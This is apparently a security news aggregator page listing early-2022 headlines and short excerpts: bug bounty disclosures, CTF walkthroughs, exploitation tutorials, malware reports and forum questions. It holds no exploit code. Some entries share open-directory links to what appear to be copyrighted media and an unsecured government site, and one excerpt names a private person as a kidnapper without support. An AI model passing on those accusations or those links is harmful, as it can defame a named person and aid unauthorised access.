    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
  • Open

    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB SOLUTIONS
    A business logic vulnerability in the design and implementation of a web application, for an attacker to elicit unintended behavior… Continue reading on Medium »  ( 15 min )
  • Open

    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
  • Open

    SecWiki News 2022-02-04 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
  • Open

    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis
  • Open

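    Winter Training Camp | The Diverse Styles of C2 in Advanced Threat Activity
    As a noun, C2 refers to the infrastructure controlled by an APT group, that is, IPs, domains, and URLs.  ( 1 min )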
  • Open

    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

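    Learning V8 Exploitation from Scratch: CVE-2020-6507 (Part 4)
    Author: Hcamael@Knownsec 404 Lab Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1) Learning V8 Exploitation from Scratch: A Generic V8 Exploit Chain (Part 2) Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3) Reproducing CVE-2020-6507 Information gathering Before reviewing a vulnerability, we first need an information-gathering stage: from Chrome's official update announcements we can learn, for a given version of Chrome, which...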
  • Open

    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested if there is a tool/software that will help me analyze logs from web server, ssh and Mysql for intrusion, but on another PC. So I basically want to pull logs from many servers and run them through some software that can detect possible SQLi or path traversal attempts, something like that. I know there is Snort and SIEMs but is there any software that will use for example Snort's engine and rules to do this analysis offline? Or can I run snort on some log file from other server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else, I use it at work and at home. Three questions: If I login to my work OneNote account, on my personal Mac/Win/Linux computers, can my work track my computers at all, or see it's MAC address or name? If I login to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply for all of OneDrive too? Appreciate any responses as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
  • Open

    Chrome 99: CSS Cascade Layers, a New Picker for Input Elements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 99 is beta as of February 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Preparing for Chrome 100 This year, Chrome will release version 100, adding a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduced a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 has been available since Chrome 96. For more information, se…
  • Open

    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bronless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)
    We continue to monitor Gamaredon. We mapped three large clusters of their infrastructure, identified potential malware testing activity and more. The post Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16) appeared first on Unit42.
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty] SSRF — IFRAME INJECTION AND REFLECTED XSS
    Today I'm going to talk a bit about a flaw that led me to two reports; unfortunately both were duplicates, but it served as experience and… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    UnderRated Tool For Pass-The-Hash[Evil-WinRM]
    First Of all I’ll Describe What is Pass-The-Hash Attack Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    i have an interview coming up soon. What sort of technical questions /scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
  • Open

    SecWiki News 2022-02-03 Review
    A new technique for bypassing an app's root detection by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premium Hacking Course In Free !! Continue reading on Medium »  ( 2 min )
  • Open

    I’m bringing relaying back: A comprehensive guide on relaying anno 2022
    For years now, Internal Penetration Testing teams have been successful in obtaining a foothold or even compromising entire domains through a technique called NTLM relaying. The earliest, most descriptive relaying blog post I could find dates all the way back to 2017 written by Marcello, better known as byt3bl33d3r: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html At the time of writing this... The post I’m bringing relaying back: A comprehensive guide on relaying anno 2022 appeared first on TrustedSec.  ( 15 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )
  • Open

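    Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3)
    Author: Hcamael@Knownsec 404 Lab Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1) Learning V8 Exploitation from Scratch: A Generic V8 Exploit Chain (Part 2) I got started with a starctf 2019 challenge called OOB, so let's talk about that challenge first. There is an article on FreeBuf, "Learning V8 Exploitation from Zero Through a CTF Challenge", which I find quite beginner-friendly; I used that article to get started with V8 exploitation. Environment setup $ git...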
  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged both font, favicon and other less-commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology related standard. It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards. submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi Anyone knows of useful edr products which could be operated on premise, without using cloud services? Could also just be a so called next gen av at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cyberason once, but the link to the on PREM offer is invalid... Bitdefender advertises an edr on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, Any tips on scanning slower with gobuster or other tool for finding paths and evade WAF. I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding CTI event that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sells access to Company B. Company A and Company B work together and have some network connexion to exchange data. In this case, we can suppose that company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sells an access, we can't determine what kind of threat we will be facing. On the business side this will be hard for them to understand that it's a potential threat and we should execute a containment phase by cutting connexion with company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should I do? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitation using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
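    2021 Annual Summary of the Security Academic Circle (安全学术圈) by ourren 2021 Year-End Summary: My Growth in the Apache IoTDB Group at Tsinghua by ourren For more of the latest articles, visit SecWiki  ( 2 min )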
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Utility components and the sx prop in Material-UI
    The Box utility component renders as a div element and makes it possible to use shorthand syntax for CSS styles… Continue reading on Medium »  ( 1 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read only external USB device with a copy of an imaged recycle bin. Goal is to pass off SUB to attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and SID of user for 2 user accounts. I properly eject SUB and connect to another laptop (B) before passing off to attorney. Laptop (B) is my day to day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug SUB into laptop (B) and navigate to recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this ? submitted by /u/ATXChimera [link] [comments]  ( 1 min )
  • Open

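    Learning V8 Exploitation from Scratch: The General V8 Exploit Chain (Part 2)
    Author: Hcamael@Knownsec 404 Lab Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1) After a period of research, I am writing up a first summary. Since I have only just started this research, it may have some limitations; if I find any later, I will correct them. Overview I believe that before working on exploitation you have to be clear about the goal. For example, in binary challenges in a CTF, in most cases the goal is to execute system(/bin/sh) or execve(/bin/sh,0,0). In V8 exploitation...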

  • Open

    Newbie investigating hdd
    Hello there, recently acquired some used HDD to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. Have a few questions: 1) Can using fdisk -l or parted -l modify data on the hdd? (both launched as root) What about gparted? (if not touching anything oc) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root? 3) Created an image with dcfldd, asked for sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Does anyone work another way? 4) Tried to import the image on autopsy with different settings but no file or anything else found. Then successfully linked to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdadm, but did not work. Any idea? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating Encase Image of Macbook Pro Max (A2485)
    Hi everyone, I want to create an EnCase image from a MacBook (Model A2485, M1 Max), but all of my attempts so far have failed. Password is known and I have physical access to the device. I have already tried the following things: - boot external USB with Paladin Edge -> failed to boot from it (tried to allow booting from external sources via recovery, but there was no option for enabling it) - put the MacBook into target disk mode and connected it to another iMac -> tried to create an image via ewfacquire, but the shared disk wasn't an extra device (or I failed to see it) - boot external USB with Paladin Edge on another iMac, put the MacBook into target disk mode and connected it to the iMac -> Paladin Edge doesn't recognize the shared disk My last idea is just to do a Time Machine backup from the MacBook to a clean / wiped HDD and create an EnCase image from it ... Does anyone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious as to how these open directories are discovered. Thanks all for being a part of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Did anyone save them and can upload them once again? Again, I'm not looking for the last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone i hope you all are fine and doing good, In December Hackerone made a 12 day 12 level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got valid p5 report and my report for p4 and p3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running vuln scan using vm workstation pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware workstation pro and Nessus Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate to the internet — it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host only VMnet, but Nessus was not able to get or use certain plugins that way. I’m looking for any help or advice setting this up how I described as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from the Play Store onto my phone. But I am scared that they might be fake apps which steal photos. I have checked the privacy policy, in which it was stated that The information that I request will be retained on your device and is not collected by me in any way. But now I'm not sure whether I can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go to if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

